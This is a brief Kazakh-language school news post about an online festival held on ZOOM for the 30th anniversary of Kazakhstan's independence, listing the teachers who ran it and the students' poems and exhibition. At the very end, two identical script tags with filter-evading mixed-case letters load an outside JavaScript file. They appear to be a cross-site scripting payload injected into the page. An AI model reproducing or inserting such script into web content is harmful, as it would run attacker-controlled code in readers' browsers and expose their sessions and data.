Қазақстан Республикасы Тәуелсіздігінің 30 – жылдығына арналған «Үлкен ел – үлкен отбасы» - этномәдени бірлестіктерінің фестивалін мектебіміздің эстетикалық бірлестігінің мұғалімдері; олар: көркем еңбек пән мұғалімі Оспанова А.Д. музыка пән мұғалімі Айтенова Д.А. көркем еңбек пән мұғалімі Балгатаев К.Ш., өзін – өзі тану пән мұғалімдері Кереева Ш.К және Аубакирова А.А бірлесіп өткізді. Іс – шара ZOOM платформасында онлайн түрде өткізілді, оқушылар Тәуелсіздігімізге арнап тақпақтар мен өлеңдер айтып өз өнерлерін ортаға салды. Онлайн көрмесі ұйымдастырылды. Фестивальға 5 – 7 сынып оқушылары, әдістемелік бірлестік жетекшілері және мұғалімдер көрермен ретінде қатысты.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>